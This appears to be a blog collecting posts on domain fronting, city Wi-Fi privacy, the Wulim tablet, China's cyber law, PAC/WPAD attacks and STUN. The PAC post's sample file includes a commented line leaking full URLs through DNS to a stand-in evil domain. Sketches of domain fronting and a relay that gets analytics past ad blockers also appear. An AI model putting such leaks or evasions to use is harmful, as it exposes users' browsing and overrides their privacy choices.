
Another Strike against Domain Fronting

In 2014, domain fronting became the newest obfuscation technique for covert, difficult-to-censor communication. Even today, the Meek pluggable transport serves ~400GB of Tor traffic each day, at a cost of ~$3,000/month.

The basic technique is to make an HTTPS connection directly to the CDN and then, once encryption has begun, make the HTTP request for the actual backing site instead. Since many CDNs use the same “front-end cache” servers for incoming requests to all of the different sites they host, there is a disconnect between the software handling SSL, which sees only the innocuous front domain, and the web server routing requests to where they need to go, which sees the encrypted Host header naming the real destination.
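To make this concrete, here is a minimal sketch of a fronted request in Go. The hostnames are hypothetical placeholders, and real deployments such as Meek wrap the same idea in considerably more machinery:

```go
package main

import (
	"crypto/tls"
	"fmt"
	"net/http"
)

func main() {
	front := "allowed-front.example.com"    // hypothetical: the name a censor sees in DNS and the TLS handshake
	backend := "hidden-backend.example.com" // hypothetical: the name sent only inside the encrypted tunnel

	// Handshake with the CDN edge using the front domain, so SNI and the
	// certificate both correspond to an innocuous site.
	client := &http.Client{
		Transport: &http.Transport{
			TLSClientConfig: &tls.Config{ServerName: front},
		},
	}

	// Once encryption has begun, the Host header names the real backing
	// site; the CDN's shared front-end routes the request on that value.
	req, err := http.NewRequest("GET", "https://"+front+"/", nil)
	if err != nil {
		panic(err)
	}
	req.Host = backend

	resp, err := client.Do(req)
	if err != nil {
		panic(err)
	}
	defer resp.Body.Close()
	fmt.Println("fronted request returned:", resp.Status)
}
```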

Even as the technique became widely adopted in 2014-2015, its demise was already predicted, with practitioners in the censorship circumvention community focused on how long it could be made to last until the next mechanism was found. This prediction rested on two points:

  1. The CDN companies would find themselves in a politically difficult position, since they would be supporting circumvention while also maintaining relationships with the censoring countries.
  2. The technique has security and cost implications that make it unattractive for both the CDNs and the practitioners.

We’ve seen both of these predictions mature.

Cloudflare explicitly doesn’t support this mechanism of circumvention, and coincidentally has major Chinese partnerships and has worked to deploy into China. Google has also limited the technique at times as it has struggled with abuse (although this is moot in China, since the Google cloud doesn’t operate there as a CDN).

In terms of cost, the most notable incident is the “Great Cannon”, which not only targeted GitHub, as widely reported, but also directed a significant amount of traffic to Amazon-hosted pages run by GreatFire, a dissident news organization, costing them a significant amount of money. GreatFire had been providing a free browser that operated by proxying all traffic through domain fronting. Due to a separate and less-reported Chinese “DDoS”, they ended up with a monthly bill of several tens of thousands of dollars and had to shut the service down.

The latest strike against domain fronting is a post from a couple of weeks back by Cobalt Strike noting that the technique is also gaining adoption for malware C&C. This abuse case will further discourage CDNs from allowing the practice to continue, since there will now be many legitimate Western voices actively calling on them to stop. Enterprises attempting to track threats on their networks, and CDN customers who do not want to be blamed for attacks, will both begin putting more pressure on the CDNs to remove the ability for different domains to be intermixed, and we should expect a continued drop in providers’ willingness to offer such a service.

Koryolink Simulator

When I was in Pyongyang a few years ago and had access to a cell phone, I recorded a bunch of the prerecorded messages that you hear when dialing or mis-dialing numbers. I found them to be an interesting glimpse into the view of technology seen in that corner of the world, and helpfully they were translated into English for my edification. I’ve put them up here, and reconstructed the phone tree you get when dialing 999, so that the different messages can be heard in context.

Privacy issues for City Wi-Fi Deployments

At the end of last month, Seattle posted a request for information exploring the feasibility of a municipal wireless deployment. With others at the Seattle Privacy Coalition, I drafted a response to the city flagging some of the major privacy issues that we hope they will consider in the initiative. I believe these issues are much broader than just our specific case, and hopefully the response can help others navigating the landscape of business models and privacy risks in this area.

Pitfalls of Public Wi-Fi: data selling, tracking of nonusers, injecting ads

Freely available municipal wireless Internet is an exciting service, but there have also been Wi-Fi deployments that have had significant, unintentional impacts on citizen privacy. This brief from the Seattle Privacy Coalition attempts to highlight some of the hidden costs that the City of Seattle should watch out for.

Many freely offered commercial wireless systems make money by selling analytics about customer behavior. An example is the Google-sponsored Wi-Fi provided at SeaTac airport and used in Starbucks coffee shops around town. While free to users, these services profit through the sale of user data to third-party advertisers.

This practice is especially questionable when low-income communities are targeted with ‘free’ services, greatly increasing the surveillance burden for an already vulnerable population.

Tracking and profiting from the sale of people’s behavior for advertising or other commercial purposes is a troubling practice at best, but it clearly goes against the public interest when it targets communities depending on a service as their primary or only access to the Internet.

Another threat to privacy found in commercial wireless deployments is the ability to track and analyze the behavior and location of every person in the vicinity, whether they are using the service or not. Cisco’s Meraki, a popular retail wireless product, advertises that it can “Glean analytics from all Wi-Fi devices connected and unconnected.”

The city, perhaps unlike a business, has a responsibility to protect citizen privacy, and we think it would be irresponsible to track the locations of unconnected devices whose owners have not explicitly opted in to such a program.

From the start, the City must have a clear understanding of how collected data will be used, and it must not collect any data without the consent of the people tracked. Few citizens will welcome long-term, involuntary behavioral and location logging of their personal electronic devices by the government.

Finally, there are wireless services based on a business model of injecting advertisements into web browsing. We merely note that this is impossible to do without severely compromising the security of the Internet experience, and we do not believe that any trade-off of benefits involving such approaches is justified.

We welcome additional digital connectivity throughout the city, and are especially excited by the potential for more equitable accessibility. There’s great potential in this technology, and while some incarnations impinge on user privacy, many others have found successful models that avoid such pitfalls.

Thoughts on Wulim

One of the exciting developments at CCC last month was a talk discussing the copy protection features in the Wulim tablet produced by the Pyongyang Information Center. This post is an attempt to reconcile the features they describe with my experience with devices around Pyongyang, and to provide some additional context on the environment the device exists within.

Threat Model

As mentioned in the talk, the Wulim tablet, and most of the devices available in Pyongyang for that matter, do a good job of defending against the primary anticipated threat: casual dissemination of subversive material. To that end, transfer of content between devices is strictly regulated, with watermarking to track how material has been transferred, a screenshot-based verification system for visual inspection, and technical limitations on the ability to run externally created applications.

One interesting point of note is that the Wulim, and the earlier Pyongyang phone from PIC, implement much of their security through a system application and kernel process named ‘Red Flag’, which shares an icon and name with the protection system on the Red Star desktop system. While the code is most likely entirely different (I haven’t actually compared), these implementations come from two separate labs and entities, indicating that there is potentially coordination, or joint compliance with a common set of security requirements.

System Security

The Wulim was difficult for the CCC presenters to gain access to. While there were bugs allowing them to view the file system, there was no easy way to casually circumvent the security systems in place. This indicates general success in defending against the threats the system was designed to protect against, and shows a significant increase in technical proficiency from the 2013/2014 devices. In the initial generations of Android-based hardware, most devices had an enabled recovery mode, and the security could generally be breached with nothing more than a computer. The alternative start-up mode found at CCC indicates that the labs are still not deeply familiar with all of the intricacies of Android, and there remain quirks in its operation that they haven’t anticipated. This will likely continue, with the attack surface shrinking as exploits are discovered and make their way back to Pyongyang.

The ‘crown jewel’ for this system, it should be noted, is an exploit that the CCC presenters did not claim to have found: the ability to create applications which can be installed on the device without modification. One of the first and most effective security mechanisms employed by the Wulim and previous generations of PIC Android systems is the requirement that applications be signed with a lab-issued key. While it is possible that either the application security check could be bypassed or information about the private key recovered from a device, this code has likely been checked quite well, and I expect such a major lapse in security to be unlikely.

The presence of this security means that I cannot install an application on your tablet from an SD card, a computer, or via Bluetooth transfer if it has not already been pre-approved. This key is potentially shared between KCC and PIC, because the stores offering to install after-market applications around Pyongyang have a single list, and are willing to try adding them to systems produced by either lab.

Connectivity

The Wulim is a 2015-2016 model, and it evidences a confidence from the labs that they’ve got software security to a reasonably appropriate level, and are more comfortable opening back up appropriate levels of connectivity between devices. The 2013 and 2014 models of tablets and phones were quite limited in connectivity, with Bluetooth a ‘high-end’ option only available on the flagship models, and Wi-Fi connectivity removed completely. In contrast, the Wulim has models with both Bluetooth and Wi-Fi, as well as the capability for PPPoE-based connectivity to intranet services broader than a single network.

This connectivity extends in two additional ways of note:

  • First, there continue to be rumors of mobile data services being tested for broader availability within the country, and the Gateway mechanism in the Wulim presents yet another clue as to how this will manifest down the road. While the Wulim tablet does not have 3G connectivity, the same software stack has been seen on phones (for instance, the Pyongyang phone series, whose most recent generation, the ‘2610’, was released in 2015).
  • Second, the same basic Android system is being used for wider installations, and is on display in the Science and Technology Exhibition Center. In that context, a custom deployment of tablets with modified software has been installed in both tablet and desktop configurations (desktop via USB keyboards and mice), connected through a LAN-local Wi-Fi network for searching the library resources on-site.

Tracking

The screenshot ‘trace viewer’ mentioned in the CCC talk is really just a file-system viewer of images taken by the same Red Flag security tool integrated into the system. The notable point here is that screenshots are taken at regular intervals of content not in a predefined white-list, so even if new signed applications are created, there is an alternative system where their presence can be detected, even if they’ve been uninstalled by the user prior to inspection. It’s worth noting that this is more effective against the transmission of images and videos containing subversive content than against applications. Applications on Android will likely be able to take advantage of screen-security APIs to prevent themselves from appearing in the list. Or, more to the point, once external code is running, the system is typically 2-3 years behind current Android, and one of several root methods can be used to escalate privileges and disable the security measures on the device.

While the CCC talk indicates that images and videos can only be viewed on the device they were created on, this was not what I observed. It was relatively common for citizens to transfer content between devices, including road maps and pictures of family and friends. The watermarking may be able to indicate lineage, but these sorts of transfers were not restricted or prevented.

Releasing

Very little underlying data was released with the CCC talk, although the presenters indicate an intention to release some of the applications and data available on the tablet they have access to. This is unfortunate. The talk, and the general environment, has already signaled to Pyongyang that devices are available externally, and much of their reaction to this reality has already occurred. In particular, devices are no longer regularly sold to foreigners within the country, as they were in 2013/14 – with a couple of exceptions where a limited software release (without the protections imposed on locals) on older hardware can be obtained.

The only remaining risk, then, is the fear of retribution against the individual who brought the device out of the country. The CCC presenters were worried that the device they have may have a serial number tied to an individual. This has not been my experience, and I believe it is highly unlikely. Cellphones with connectivity do need to be attached to a passport at the point of sale, but tablets, as of spring 2015, continued to be sold without registration. The serial numbers observed by the CCC presenters are version numbers common to the image placed on all of the tablets of that generation.

First-party Google Analytics

Third-party analytics services are suffering from the growing prevalence of ad blocking, tracking protection, and the trend toward minimizing connections and requests. However, from a site owner’s perspective, receiving usage information remains important for measuring site growth.

My expectation is that we are already on the curve where ads and tracking software will be more tightly integrated into websites, making it significantly more difficult for clients to disambiguate “good” and “bad” scripts, which is mostly done today based on the URL.

Google already provides the tools needed to relay analytics traffic through an intermediate server, and it took under an hour to put together a proof of concept that removes the final third-party requests required when viewing this page. In essence, my server proxies all the requests that would normally go to Google, and adds a couple of extra parameters to identify the real client.

The modified loading script for Google Analytics and the corresponding nginx configuration to make my server a relay are here.
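The actual relay is an nginx configuration plus a tweaked loading script, but the same idea can be sketched in a few lines of Go. The /analytics/ mount point is a hypothetical choice, and the use of the Measurement Protocol’s IP-override parameter is an assumption about how to keep geography reports useful, not a description of the exact setup:

```go
package main

import (
	"log"
	"net"
	"net/http"
	"net/http/httputil"
	"net/url"
)

func main() {
	// Upstream analytics endpoint that the relay forwards hits to.
	target, err := url.Parse("https://www.google-analytics.com")
	if err != nil {
		log.Fatal(err)
	}

	proxy := httputil.NewSingleHostReverseProxy(target)
	director := proxy.Director
	proxy.Director = func(r *http.Request) {
		director(r)
		r.Host = target.Host
		// Pass along the real visitor's IP (the "uip" IP-override parameter
		// of the v1 Measurement Protocol) so hits aren't attributed to the
		// relay server itself; treat this detail as an assumption.
		if ip, _, err := net.SplitHostPort(r.RemoteAddr); err == nil {
			q := r.URL.Query()
			q.Set("uip", ip)
			r.URL.RawQuery = q.Encode()
		}
	}

	// Browsers send every analytics request to the first-party origin under
	// /analytics/ and never contact the third-party host directly.
	http.Handle("/analytics/", http.StripPrefix("/analytics", proxy))
	log.Fatal(http.ListenAndServe(":8080", nil))
}
```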

Thoughts on China’s Updated Cyber-security Regulations

On Monday, China ratified updated cybersecurity legislation that will enter into effect next June. The policy regulates a number of aspects of the Chinese Internet: what data companies need to keep on domestic servers, the interaction between companies and the government, and the interaction between companies and Chinese users.

Notably, when considering the impact on the Internet, the law includes:

  • Network operators are expected to record network security incidents and store logs for at least six months (Article 21).
    Note that the punishment for refusing to keep logs is a fine of up to US$10,000 for the operator, and of up to US$5,000 for the responsible person.
  • Services must require real-identity information for network access, telecom service, domain registration, blogging, or IM (Article 24).
    The punishment for failing to require identity is up to US$100,000 and suspension of operations.
  • Network operators must provide support to the government for national security and crime investigations (Article 28).
  • If a service discovers prohibited user-generated content, it must remove it, save logs, and report to the government (Article 47).
    The punishment for failing to do so is up to US$100,000 and closure of the website.

The concerns from foreign companies seem to center on a couple of things. The first is that there’s a fairly vague classification of ‘critical infrastructure’, which explicitly includes power, water, and other infrastructure, but also refers to services needed for public welfare and national security. Any such service gets additional monitoring requirements, and needs to keep all data on the mainland. Companies are worried that they could be classified as critical services, and that there aren’t clear guidelines about how to avoid or limit the risk of becoming subject to those additional regulations.

The other main concern is the fairly ambiguous requirement to support government national security investigations. There’s a worry that there aren’t really any limits in place on how much the government can request from services, which could include requiring them to add back doors or to perform significant technical analysis without compensation.

My impression is that these regulations aren’t much of a surprise within China, and they are unlikely to cause much in the way of change from how smaller companies and individuals experience Internet management already.

Watch your PAC

In the last week at Black Hat / DEF CON, two groups looked deeply at one of the lesser-known mechanisms of network policy, Proxy AutoConfig. (In particular, badWPAD by Maxim and Crippling HTTPS with Unholy PAC by SafeBreach.)

Proxy AutoConfig (PAC) is a mechanism used by many organizations to configure an advanced policy for connecting to the Internet. A PAC file is written in JavaScript to provide a dynamic determination of how different connections should be made, and which proxy they should use. In particular, international companies with satellite offices often find the PAC system useful in routing some traffic through a corporate proxy for compliance or geographical reasons while other traffic is routed directly to the Internet.

These two talks both focus on what a malicious individual could do to attack the standard, and each finds an interesting line of attack. The first attack is that the PAC file is allowed to make DNS requests in determining how to proxy connections, and in many browsers it sees the full URL being accessed rather than only the domain. This means that even when the user is communicating with a remote server over HTTPS, the local network can learn the full URL being visited. The second attack has to do with how computers find PAC files on their local network: they automatically look for a file called `wpad.dat`.
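To make the mechanism concrete, here is a minimal PAC file (which, per the specification, must be JavaScript). The proxy address and the “evil” lookup domain are hypothetical, and the commented-out line is only a sketch of how the full-URL visibility could be abused:

```javascript
// Minimal PAC file: the browser calls FindProxyForURL for every request.
function FindProxyForURL(url, host) {
  // Legitimate use: send traffic for internal hosts through the corporate
  // proxy, and everything else directly to the Internet.
  if (shExpMatch(host, "*.internal.example.com")) {
    return "PROXY proxy.internal.example.com:8080";
  }

  // The abuse described above: because many browsers pass the full URL
  // (even for HTTPS pages), a malicious PAC could leak it, for example by
  // folding it into a DNS lookup visible to the local network:
  // dnsResolve(url.replace(/[^A-Za-z0-9]/g, "-") + ".evil.example.com");

  return "DIRECT";
}
```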

While there is certainly the potential for an attacker to target a victim through these technologies, they are more accessible, and arguably more valuable, to an ISP or state-level actor interested in passive surveillance. This explicit policy for connectivity is not inherently more invasive than policies employed by many ISPs already, and could likely be deployed on many networks without consumer pushback as a performance enhancement for better caching. It is also well suited to targeted surveillance, since vulnerability can be determined passively.

The viability of surveillance through WPAD and PACs is a bit of a mixed bag. Most ISPs already use DHCP and set a “search domain”, which will result in a recognizable request for proxy information from vulnerable clients. While organizations often require all clients to enable discovery, this is not true of many consumer machines. Unfortunately, some versions of Windows have proxy discovery enabled by default.

The Nmap tool, used for network exploration and pitched towards use by network attackers, already has support for WPAD. In contrast, network status and monitoring tools like Netalyzr and OONI do not yet monitor local proxy status and won’t provide any indication of malicious behavior.

Stunning

I’ve started to dive once again into the mess of connection establishment. Network address translation (NAT) is a reality today for most Internet users, and poses a significant hurdle in creating user-to-user (or peer-to-peer) connections. NAT is the process used by your router to provide multiple internal (192.168.x.x) addresses that are all visible only as a single external address on the Internet. The challenge caused by this device is that if someone outside wants to connect to your computer, they have to figure out how to get the router to send their traffic to you, and not just drop it or send it to another computer on your network.

Without configuring your router to add a ‘port forwarding’ rule, it isn’t supposed to do this, so many of the connection establishment procedures are really ways to trick your NAT into forwarding traffic without realizing what’s happening.

There are two main transport protocols on the Internet today: UDP and TCP. UDP is stateless: each “packet” of data is its own message and is self-contained. In contrast, TCP represents a longer “stream” of data, in which many messages are sent with an explicit ordering. TCP connections are much harder to trick routers into establishing, and there has been little work there.

The current generation of p2p systems is led by high-bandwidth applications that want to offload traffic from central servers in order to save on bandwidth costs. Good examples are Google Hangouts and other VoIP (voice over IP) and video-calling traffic.

These systems establish a channel to send UDP traffic between two computers that are both behind NAT routers using a system called ICE (Interactive Connectivity Establishment). This is a complex dance with multiple sub-protocols used to try several different ways of establishing connectivity and tricking the routers.

One of the key systems used by ICE is a publicly visible server that speaks a protocol called STUN. A STUN server provides a way for a client to open a UDP connection through its router to a server that is known to be able to receive messages, and then learn what that connection looks like from outside the router. The client can then provide that external view of its connection to another peer, which may be able to send messages to the same external address and port and have them forwarded back to the client.
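As a rough illustration of the binding exchange, here is a standard-library-only sketch in Go (this is not my library’s API; the public STUN server address is just a commonly cited example, and error handling is minimal):

```go
package main

import (
	"crypto/rand"
	"encoding/binary"
	"fmt"
	"net"
	"time"
)

const magicCookie = 0x2112A442 // fixed value defined by RFC 5389

func main() {
	// Any publicly reachable RFC 5389 STUN server should work here.
	conn, err := net.Dial("udp", "stun.l.google.com:19302")
	if err != nil {
		panic(err)
	}
	defer conn.Close()
	conn.SetDeadline(time.Now().Add(5 * time.Second))

	// Binding Request: 2-byte type (0x0001), 2-byte length (no attributes),
	// the magic cookie, and a random 12-byte transaction ID.
	req := make([]byte, 20)
	binary.BigEndian.PutUint16(req[0:2], 0x0001)
	binary.BigEndian.PutUint32(req[4:8], magicCookie)
	if _, err := rand.Read(req[8:20]); err != nil {
		panic(err)
	}
	if _, err := conn.Write(req); err != nil {
		panic(err)
	}

	resp := make([]byte, 1500)
	n, err := conn.Read(resp)
	if err != nil {
		panic(err)
	}

	// Walk the attributes looking for XOR-MAPPED-ADDRESS (type 0x0020),
	// which encodes this socket's address as seen from the Internet.
	for i := 20; i+4 <= n; {
		attrType := binary.BigEndian.Uint16(resp[i : i+2])
		attrLen := int(binary.BigEndian.Uint16(resp[i+2 : i+4]))
		if attrType == 0x0020 && attrLen >= 8 && i+4+attrLen <= n {
			v := resp[i+4 : i+4+attrLen]
			port := binary.BigEndian.Uint16(v[2:4]) ^ uint16(magicCookie>>16)
			rawIP := binary.BigEndian.Uint32(v[4:8]) ^ magicCookie
			ip := make(net.IP, 4)
			binary.BigEndian.PutUint32(ip, rawIP)
			fmt.Printf("external view of this socket: %s:%d\n", ip, port)
			return
		}
		i += 4 + (attrLen+3)/4*4 // attributes are padded to 4-byte boundaries
	}
	fmt.Println("no XOR-MAPPED-ADDRESS attribute in the response")
}
```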

One unfortunate aspect of this situation is that the complexity of these systems has led to very few implementations. Libraries that make these techniques easy to reuse would allow more p2p systems to keep working on the modern Internet without forcing users to manually configure their routers.

I’ve started work on a standalone Go implementation of the ICE connectivity stack. Over the weekend I reached the first milestone: the library can create a STUN connection and learn the external appearance of the connection as reported by the STUN server.